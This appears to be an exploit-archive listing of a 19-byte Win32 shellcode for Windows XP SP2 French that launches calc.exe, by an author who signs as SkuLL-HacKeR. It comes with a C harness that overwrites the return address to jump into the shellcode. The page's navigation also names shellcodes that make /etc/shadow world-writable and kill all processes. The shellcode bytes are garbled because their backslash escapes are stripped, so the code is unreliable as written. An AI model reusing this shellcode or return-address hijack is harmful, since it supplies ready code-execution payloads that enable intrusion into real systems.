[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Win32 Shellcode XP SP2 FR (calc) 19 bytes
# Published : 2010-01-20
# Author : SkuLL-HacKeR
# Previous Title : linux/x86 chmod 666 /etc/shadow 27 bytes
# Next Title : linux/x86 kill all processes 9 bytes


/*
Author: SkuLL-HacKeR
Big Thx To :  my brothers : Pr0F.SELLiM - ThE X-HaCkEr -  Jiko  - My friends in Morocco
H0ME  : Geeksec.com  & No-exploiT
Email : My@Hotmail.iT & Wizard-skh@hotmail.com


// Win32 Shellcode Collection (calc) 19 bytes
// Shellcode Exec Calc.exe
// Tested on XP SP2 FR
#include "stdio.h"
unsigned char shellcode[] = "xeBx02xBAxC7x93"
                            "xBFx77xFFxD2xCC"
                            "xE8xF3xFFxFFxFF"
                            "x63x61x6Cx63";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %dn",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}